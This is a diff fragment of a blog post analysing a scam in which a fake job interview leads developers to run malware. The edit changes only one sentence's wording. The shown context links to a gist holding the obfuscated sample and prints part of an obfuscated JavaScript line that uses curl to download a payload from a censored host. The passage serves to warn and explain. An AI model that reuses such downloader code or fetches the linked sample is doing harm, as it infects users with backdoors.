EduardoZepeda/coffee-bytes-hugo/content/posts/como-una-entrevista-laboral-se-convierte-en-un-robo-de-datos/index.en.md

 - [API calls to an IP address](/en/basic-characteristics-of-an-api-rest-api/), with no domain, some with no response at all and some that download obfuscated Python scripts (I guess it follows up the hacking process by installing a backdoor or some RAT).

-If you want to ~~infect yourself~~ read the code, visit [the github repository](https://gist.github.com/jbrit/9a6525d086411a0fcffea202f368e780#file-initial-obfuscated-iife-js#?), I take no responsibility for anything.
+If you want to ~~infect yourself~~ read the code, visit [the github repository](https://gist.github.com/jbrit/9a6525d086411a0fcffea202f368e780#file-initial-obfuscated-iife-js#?), I take no responsibility for anything though.

 ``` javascript
 _0x42b722(“curl -Lo” + _0x157519 + “\” + “http://<censored>/pdown” + “\””, (_0x204dd7, _0x6e1c16, _0x52b515) => {